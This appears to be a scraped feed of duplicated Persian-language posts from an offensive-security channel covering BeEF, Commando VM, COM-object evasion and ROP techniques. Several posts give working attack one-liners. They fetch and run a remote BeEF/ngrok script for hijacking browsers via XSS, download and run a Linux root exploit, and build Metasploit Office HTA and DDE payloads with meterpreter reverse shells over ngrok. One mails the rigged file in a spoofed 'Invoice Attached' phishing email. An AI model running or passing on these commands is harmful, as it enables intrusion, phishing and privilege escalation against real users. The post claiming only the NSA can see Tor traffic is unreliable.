#BeEF Installer & Configure & Used Ngrok DNS
اسکریپتی برای راحتی دوستان نوشتم که به یک کلیک بصورت اتوماتیک DNS سرویس Ngrok رو براتون نصب میکنه Enivorment میکنه و دامنه ای از اون فعال کرده و فریمورک BeEF رو بر روی اون دامنه تنظیم کرده همچنین ارتباط BeEF رو از طریقه Proxy تنظیم کرده و Exten OBF پایلودش رو هم فعال کرده و Module های Metasploit رو هم اتصال میده به برنامه BeEF به زبان ساده بخوام بگم استارت کنید و بر روی هر وبسایتی که آسیب پذیری XSS داره پایلود رو تزریق از گرفتن Access Browser لذت ببرید درضمن با این روش نیازی به فروارد پورتی هم نیست...
Automation Running
Enable Obfuscation
Enable HttpProxy
Enable SSL Protocol
Enable Evasion
Enable Metasploit Modules
Set and Configure Ngrok DNS
Open terminal
root@unk9vvn:~#
اسکریپتی برای راحتی دوستان نوشتم که به یک کلیک بصورت اتوماتیک DNS سرویس Ngrok رو براتون نصب میکنه Enivorment میکنه و دامنه ای از اون فعال کرده و فریمورک BeEF رو بر روی اون دامنه تنظیم کرده همچنین ارتباط BeEF رو از طریقه Proxy تنظیم کرده و Exten OBF پایلودش رو هم فعال کرده و Module های Metasploit رو هم اتصال میده به برنامه BeEF به زبان ساده بخوام بگم استارت کنید و بر روی هر وبسایتی که آسیب پذیری XSS داره پایلود رو تزریق از گرفتن Access Browser لذت ببرید درضمن با این روش نیازی به فروارد پورتی هم نیست...
Automation Running
Enable Obfuscation
Enable HttpProxy
Enable SSL Protocol
Enable Evasion
Enable Metasploit Modules
Set and Configure Ngrok DNS
Open terminal
root@unk9vvn:~#
wget https://gist.githubusercontent.com/a9v8i/3f82d7e345da63db3ca09978cf9bbfed/raw/77a3bcd652bc85c76a9517ca6f490ac7490ee03d/beefer.sh;chmod +x beefer.sh;./beefer.sh
@Unk9vvN#CommandoVM
چند وقتی هست که شرکت FireEye محصولی رو در گیت هاب خودش ثبت کرده که به گونه ای Installer تمام ابزار های مورد نیاز یک هکر Offensive رو بر روی سیستم عامل ویندوز 10 نصب میکنه, اینکار به واسطه یک اسکریپت پاورشل انجام میشه من خودم تست کردم عالیه و تمام نیاز ابزاری شمارو بر طرف خواهد کرد
در مرحله اول اسکریپت رو دانلود و به دسکتاپ خودتون انتقال بدید
https://github.com/fireeye/commando-vm/archive/master.zip
بعد وارد فولدر شده و دستورات رو وارد کنید,
# Open Powershell (Run as administator)
PS C:\Users\Unk9vvN>
https://github.com/fireeye/commando-vm#installed-tools
https://www.fireeye.com/blog/threat-research/2019/03/commando-vm-windows-offensive-distribution.html
@Unk9vvN
چند وقتی هست که شرکت FireEye محصولی رو در گیت هاب خودش ثبت کرده که به گونه ای Installer تمام ابزار های مورد نیاز یک هکر Offensive رو بر روی سیستم عامل ویندوز 10 نصب میکنه, اینکار به واسطه یک اسکریپت پاورشل انجام میشه من خودم تست کردم عالیه و تمام نیاز ابزاری شمارو بر طرف خواهد کرد
در مرحله اول اسکریپت رو دانلود و به دسکتاپ خودتون انتقال بدید
https://github.com/fireeye/commando-vm/archive/master.zip
بعد وارد فولدر شده و دستورات رو وارد کنید,
# Open Powershell (Run as administator)
PS C:\Users\Unk9vvN>
cd .\Desktop\commando-vm\
PS C:\Users\Unk9vvN\Desktop\commando-vm> Set-ExecutionPolicy Unrestricted
PS C:\Users\Unk9vvN\Desktop\commando-vm> .\install.ps1
لیست ابزارهای نصبی:https://github.com/fireeye/commando-vm#installed-tools
https://www.fireeye.com/blog/threat-research/2019/03/commando-vm-windows-offensive-distribution.html
@Unk9vvN
#Local_Root_Linux 4.10 < 5.1.17
برخی دوستان Exploit جدیدی در خصوص Privilege کردن ورژن های جدید کرنل لینوکس درخواست کرده بودن که در این پست یکی از پابلیک هاش رو معرفی میکنم...
# Open terminal
root@unk9vvn:~#
برخی دوستان Exploit جدیدی در خصوص Privilege کردن ورژن های جدید کرنل لینوکس درخواست کرده بودن که در این پست یکی از پابلیک هاش رو معرفی میکنم...
# Open terminal
root@unk9vvn:~#
wget https://raw.githubusercontent.com/jas502n/CVE-2019-13272/master/CVE-2019-13272.c;gcc -s CVE-2019-13272.c -o pwned;./pwned
@Unk9vvN#Request Process to Memory
بد نیست در خصوص روند درخواست هایی که از سمت UserLand ارسال شده و در سمت KernelLand یا Ring 0 چه اتفاقاتی می افته و چگونه پروسس ما بر روی Memory مپ و اجرا میشه...
نکته ای که اینجا یکم میتونم بهش اشاره کنم اینه که اگر یک پروسس دارای یک Struct باشه و اون Struct دارای دو عنصر که یکی از اون ها از نوع DOWRD و دیگری از نوع QWORD باشه میتونه موجب رخداد یک Padding که بدلیل uninitialized حساب شدن مقادیر Padding میتونه نشان از چه آسیب پذیری باشه ؟ همونطور که میدونید عنصر و متغیرهایی که مقدار دهی اولیه ندارند uninitialize حساب شده و بصورت پیشفرض مقدار 0 رو دارند, دوستان اهل فن, پیگر همچنین شرایطی در ارسال Request به سمت Ring 0 بشن ببینن چه باگی رخ میده این وسط.
@Unk9vvN
بد نیست در خصوص روند درخواست هایی که از سمت UserLand ارسال شده و در سمت KernelLand یا Ring 0 چه اتفاقاتی می افته و چگونه پروسس ما بر روی Memory مپ و اجرا میشه...
نکته ای که اینجا یکم میتونم بهش اشاره کنم اینه که اگر یک پروسس دارای یک Struct باشه و اون Struct دارای دو عنصر که یکی از اون ها از نوع DOWRD و دیگری از نوع QWORD باشه میتونه موجب رخداد یک Padding که بدلیل uninitialized حساب شدن مقادیر Padding میتونه نشان از چه آسیب پذیری باشه ؟ همونطور که میدونید عنصر و متغیرهایی که مقدار دهی اولیه ندارند uninitialize حساب شده و بصورت پیشفرض مقدار 0 رو دارند, دوستان اهل فن, پیگر همچنین شرایطی در ارسال Request به سمت Ring 0 بشن ببینن چه باگی رخ میده این وسط.
@Unk9vvN
#OOB #COM_Objects
یکی از راه های فرار از دست دیوایس های SOC همیشه استفاده از تکنیک های پرش بر روی COM Object های سیستم عامله که در جریان هر کدام از این Stage ها میشه قسمتی از کار و زمینه سازی برای اجرای Payload اصلی را انجام داد,
البته چند و چون این روش ها بسیار متغیر است و بعضا رفته رفته غیر قابل پیشبینی میشود مثل همین نوع سناریو ای که در تصویر است منظورم دانلود یک فایل فرمت تصویری هستش که در بتن اون با رمزنگاری Steganography پایلود گنجانده شده و به واسطه یک Stage دیگه دانلود و دیکد شده و پایلود اصلی در قالب یک DLL فایل که بصورت Reflective اجرا و دسترسی آخر C&C رو حاصل میکنه, روش جالبیه نه؟ اما دیگه قدیمیه...
https://www.fireeye.com/blog/threat-research/2019/06/hunting-com-objects.html
https://www.fireeye.com/blog/threat-research/2019/06/hunting-com-objects-part-two.html
@Unk9vvN
یکی از راه های فرار از دست دیوایس های SOC همیشه استفاده از تکنیک های پرش بر روی COM Object های سیستم عامله که در جریان هر کدام از این Stage ها میشه قسمتی از کار و زمینه سازی برای اجرای Payload اصلی را انجام داد,
البته چند و چون این روش ها بسیار متغیر است و بعضا رفته رفته غیر قابل پیشبینی میشود مثل همین نوع سناریو ای که در تصویر است منظورم دانلود یک فایل فرمت تصویری هستش که در بتن اون با رمزنگاری Steganography پایلود گنجانده شده و به واسطه یک Stage دیگه دانلود و دیکد شده و پایلود اصلی در قالب یک DLL فایل که بصورت Reflective اجرا و دسترسی آخر C&C رو حاصل میکنه, روش جالبیه نه؟ اما دیگه قدیمیه...
https://www.fireeye.com/blog/threat-research/2019/06/hunting-com-objects.html
https://www.fireeye.com/blog/threat-research/2019/06/hunting-com-objects-part-two.html
@Unk9vvN
#Traceroute_Traffics
برخی ها گمان میکنند که اطلاعات و ترافیک اینترنتی اونها صرفا در زیرساخت کشوری که زندگی میکنند وارد شده و در دسترس است, خب همونطور که در تصویر هم میبینید اینطور نیست و ترافیک های خارجی همگی بر بستر شبکه سازمان NSA آمریکا رفته و نه تنها ISP مقصد و مبدا هم دسترسی به این ترافیک ها دارند بلکه این وسط دستگاه های اطلاعاتی کشورها هم در این ماجرا نقش دارند,
برخی ها گمان میکنند که ترافیک شبکه Tor برای زیر ساخت ایران قابل مشاهده است, که میبایست عرض کنم اینطور نیست و تنها نهادی که میتواند به ترافیک های شبکه Tor دسترسی داشته باشد سازنده آن یعنی NSA است, البته نکته ای هم اینجا عرض کنم که امروزه با استفاده از پروتکل هایی همچون HTTPS و مکانیزم رمزنگاری ترافیک TLS و SSL دیگه در فضای باز اطلاعاتی هم امکان شنود ترافیک یک برنامه با این ویژگی ها برای زیرساخت ها امکان پذیر نیست مگر با داشتن Certificate اون تونل ارتباطی, نمونش همین پیام رسان تلگرام که بسیاری از دستگاها در تلاش برای شنود آن بودند اما نتیجه ای نگرفتن و نهایتا رو آوردند بر تکنیک جمع آوری اطلاعات از سمت خود کاربر در قالب برنامه هایی جذاب.
@Unk9vvN
برخی ها گمان میکنند که اطلاعات و ترافیک اینترنتی اونها صرفا در زیرساخت کشوری که زندگی میکنند وارد شده و در دسترس است, خب همونطور که در تصویر هم میبینید اینطور نیست و ترافیک های خارجی همگی بر بستر شبکه سازمان NSA آمریکا رفته و نه تنها ISP مقصد و مبدا هم دسترسی به این ترافیک ها دارند بلکه این وسط دستگاه های اطلاعاتی کشورها هم در این ماجرا نقش دارند,
برخی ها گمان میکنند که ترافیک شبکه Tor برای زیر ساخت ایران قابل مشاهده است, که میبایست عرض کنم اینطور نیست و تنها نهادی که میتواند به ترافیک های شبکه Tor دسترسی داشته باشد سازنده آن یعنی NSA است, البته نکته ای هم اینجا عرض کنم که امروزه با استفاده از پروتکل هایی همچون HTTPS و مکانیزم رمزنگاری ترافیک TLS و SSL دیگه در فضای باز اطلاعاتی هم امکان شنود ترافیک یک برنامه با این ویژگی ها برای زیرساخت ها امکان پذیر نیست مگر با داشتن Certificate اون تونل ارتباطی, نمونش همین پیام رسان تلگرام که بسیاری از دستگاها در تلاش برای شنود آن بودند اما نتیجه ای نگرفتن و نهایتا رو آوردند بر تکنیک جمع آوری اطلاعات از سمت خود کاربر در قالب برنامه هایی جذاب.
@Unk9vvN
#DotNetToJScript
همیشه یکی از چالش های هکرها برای فرار از Detect شدن این بوده که با استفاده از COM آبجکت های مختلف و ترجیحا جدید بتوانند تطبق Struct که اون COM داره پایلودی رو ساخته و به اجرا در بیاورند, در سال 2017 محققی با نام مستعار enigma0x3 یکی از این سبک استفاده از COM آبجکت ها رو تشریح و سناریو سازی کرد,
نکته جالب این ماجرا اینه که این فرد درک کرده بود که DCOM آبجکتی با نام Outlook.Application که به دلیل امکان ارسال دستورات از راه دور از نوع آبجکت های DCOM دسته بندی میشه, دارای آبجکتی با نام ScriptControl هستش که همین موضوع موجب صدا زدن مفسرهای زبان VBScript و JScriptخواهد شد و با استفاده از JScript توانسته class های زبان NET. پایلودی که بصورت Serialize در آمده رو Deserialize و به اجرا در بیاورد, از این روی میتوان گفت کدهای #C رو میشود بر بستر JScript با استفاده از DCOM آبجکت توضیح داده شده اجرا کرد که همین موضوع منجر به دور زدن مکانیزم هایی میشود که دایره تحت نظر آنها کمتر بر بستر این مدل DCOM آبجکت ها میباشد...
REF
@Unk9vvN
همیشه یکی از چالش های هکرها برای فرار از Detect شدن این بوده که با استفاده از COM آبجکت های مختلف و ترجیحا جدید بتوانند تطبق Struct که اون COM داره پایلودی رو ساخته و به اجرا در بیاورند, در سال 2017 محققی با نام مستعار enigma0x3 یکی از این سبک استفاده از COM آبجکت ها رو تشریح و سناریو سازی کرد,
نکته جالب این ماجرا اینه که این فرد درک کرده بود که DCOM آبجکتی با نام Outlook.Application که به دلیل امکان ارسال دستورات از راه دور از نوع آبجکت های DCOM دسته بندی میشه, دارای آبجکتی با نام ScriptControl هستش که همین موضوع موجب صدا زدن مفسرهای زبان VBScript و JScriptخواهد شد و با استفاده از JScript توانسته class های زبان NET. پایلودی که بصورت Serialize در آمده رو Deserialize و به اجرا در بیاورد, از این روی میتوان گفت کدهای #C رو میشود بر بستر JScript با استفاده از DCOM آبجکت توضیح داده شده اجرا کرد که همین موضوع منجر به دور زدن مکانیزم هایی میشود که دایره تحت نظر آنها کمتر بر بستر این مدل DCOM آبجکت ها میباشد...
REF
@Unk9vvN
#RedTeam_CVE_2017-0199
در سناریو های #RT معمولا آسیب پذیری هایی که در خصوص فایل فرمت ها ارائه شده استفاده میشود,چرا که بسیاری از قربانیان محصولات نرم افزاری خودشون رو بروز نمیکنند, در نتیجه همچنان این دست حملات کارآمدی دارد
root@unk9vvn:~#
در سناریو های #RT معمولا آسیب پذیری هایی که در خصوص فایل فرمت ها ارائه شده استفاده میشود,چرا که بسیاری از قربانیان محصولات نرم افزاری خودشون رو بروز نمیکنند, در نتیجه همچنان این دست حملات کارآمدی دارد
root@unk9vvn:~#
apt-get install -y sendemail tor;service tor start;gnome-terminal --tab -e 'proxychains ngrok tcp 8443';NGROK_PORT=$(FUZ=$(curl --silent --show-error http://127.0.0.1:4040/api/tunnels | sed -nE 's/.*public_url":"tcp:\/\/0.tcp.ngrok.io:([^"]*).*/\1/p') && echo "$FUZ");sleep 5;msfconsole -qx "use exploit/windows/fileformat/office_word_hta;set PAYLOAD windows/x64/meterpreter/reverse_https;set LHOST 0.tcp.ngrok.io;set LPORT "$NGROK_PORT";set ReverseListenerBindAddress 127.0.0.1;set ReverseListenerBindPort 8443;set FILENAME product.rtf;set EnableStageEncoding true;exploit -j"
root@unk9vvn:~# mv /root/.msf4/local/product.rtf /root;sendEmail -f support@megacloud.com -t <Email-TARGET> -u "Invoice Attached" -m "Please Check Product" -a product.rtf -s <SMTP-SERVER> -v
@Unk9vvN#Office #DDE_Delivery
در پست قبلی در خصوص یک آسیب پذیری در فایل فرمت های Document Word رو توضیح دادیم, اما در این پست در خصوص یکی دیگر از این فایل فرمت ها که آسیب پذیری ذکر نشده اما فرمول #DDEAUTO میتونه منجر به فراخوانی پایلود یک COM Object بشه از روی C2 هکر و پایلود اجرا بشه, این هم یکی از پلن های #RT ها هستش
# Open terminal
root@unk9vvn:~#
@Unk9vvN
در پست قبلی در خصوص یک آسیب پذیری در فایل فرمت های Document Word رو توضیح دادیم, اما در این پست در خصوص یکی دیگر از این فایل فرمت ها که آسیب پذیری ذکر نشده اما فرمول #DDEAUTO میتونه منجر به فراخوانی پایلود یک COM Object بشه از روی C2 هکر و پایلود اجرا بشه, این هم یکی از پلن های #RT ها هستش
# Open terminal
root@unk9vvn:~#
apt-get install -y tor;service tor start;gnome-terminal --tab -e 'proxychains ngrok tcp 8443';NGROK_PORT=$(FUZ=$(curl --silent --show-error http://127.0.0.1:4040/api/tunnels | sed -nE 's/.*public_url":"tcp:\/\/0.tcp.ngrok.io:([^"]*).*/\1/p') && echo "$FUZ");sleep 5;msfconsole -qx "use windows/fileformat/office_dde_delivery;set PAYLOAD windows/x64/meterpreter/reverse_https;set LHOST 0.tcp.ngrok.io;set LPORT "$NGROK_PORT";set ReverseListenerBindAddress 127.0.0.1;set ReverseListenerBindPort 8443;set FILENAME product.rtf;set EnableStageEncoding true;exploit -j"
https://gist.github.com/xillwillx/171c24c8e23512a891910824f506f563#file-cactustorchddeauto-sh@Unk9vvN
#RET2CSU
در سیستم عامل های ۶۴ بیتی دیگه تکنیک RET2Libc پاسخگوی دور زدن مکانیزم های دفاعی سیستم عامل در مقابل اجرا کد نیستند, در نتیجه تکنیک دیگری به نام Ret2CSU جایگزین تکنیک قبلی برای ساخت یک زنجیره Return Oriented Programming استفاده میشود که این تکنیک در بلکهت 2018 آسیا رو نمایی شده است,
اولین نکته این است که در تکنیک Ret2Libc به دلیل قرار گرفتن توابع در پشته ما میتوانستیم عملیات برگشت در کتابخانه سی رو انجام بدیم اما در سیستم های ۶۴ بیتی به دلیل قرار گرفتن اینکه پارامترهای عملکردی بر روی رجیسترها منتقل میشه دیگه مکانیزم Ret2Libc پاسخگوی ما نخواهد بود, نکته دیگه ای که وجود داره نقش Application Binary Interface یا ABI هستش که مسئولیت تماس با پارامترها در Register های ۶۴ بیتی رو دارا هستش, و اینکه بستری برای کنترل و فراخوان CSU خواهد بود.
@Unk9vvN
در سیستم عامل های ۶۴ بیتی دیگه تکنیک RET2Libc پاسخگوی دور زدن مکانیزم های دفاعی سیستم عامل در مقابل اجرا کد نیستند, در نتیجه تکنیک دیگری به نام Ret2CSU جایگزین تکنیک قبلی برای ساخت یک زنجیره Return Oriented Programming استفاده میشود که این تکنیک در بلکهت 2018 آسیا رو نمایی شده است,
اولین نکته این است که در تکنیک Ret2Libc به دلیل قرار گرفتن توابع در پشته ما میتوانستیم عملیات برگشت در کتابخانه سی رو انجام بدیم اما در سیستم های ۶۴ بیتی به دلیل قرار گرفتن اینکه پارامترهای عملکردی بر روی رجیسترها منتقل میشه دیگه مکانیزم Ret2Libc پاسخگوی ما نخواهد بود, نکته دیگه ای که وجود داره نقش Application Binary Interface یا ABI هستش که مسئولیت تماس با پارامترها در Register های ۶۴ بیتی رو دارا هستش, و اینکه بستری برای کنترل و فراخوان CSU خواهد بود.
@Unk9vvN
#Memory_Segmentation
بد نیست در خصوص ساختار و چگونگی مپ شدن کدهای سطح بالا رو بر روی حافظه دیده و یک تصویر درستی داشته باشیم چرا که در بحث دور زدن مکانیزم های دفاعی حتما شناخت این موارد بسیار مهم خواهد بود,
بطور مثال زمانی که ما بخواهیم از تکنیک Stack_Pivoting استفاده کنیم برای دور زدن مکانیزم هایی مثل SMEP/NX حتما میبایست مکانیزم عملکرد سیستم عامل هارا مخصوصا قسمت هایی مانند LDT و GDT رو درک کرده باشیم چرا که ساخت یک استک و تنظیم کردن Stack Selector یا SS مقوله حیاتی این سبک از بایپس ها خواهد بود...
http://hypervsir.blogspot.com/2015/01/a-software-solution-to-defend-against.html
@Unk9vvN
بد نیست در خصوص ساختار و چگونگی مپ شدن کدهای سطح بالا رو بر روی حافظه دیده و یک تصویر درستی داشته باشیم چرا که در بحث دور زدن مکانیزم های دفاعی حتما شناخت این موارد بسیار مهم خواهد بود,
بطور مثال زمانی که ما بخواهیم از تکنیک Stack_Pivoting استفاده کنیم برای دور زدن مکانیزم هایی مثل SMEP/NX حتما میبایست مکانیزم عملکرد سیستم عامل هارا مخصوصا قسمت هایی مانند LDT و GDT رو درک کرده باشیم چرا که ساخت یک استک و تنظیم کردن Stack Selector یا SS مقوله حیاتی این سبک از بایپس ها خواهد بود...
http://hypervsir.blogspot.com/2015/01/a-software-solution-to-defend-against.html
@Unk9vvN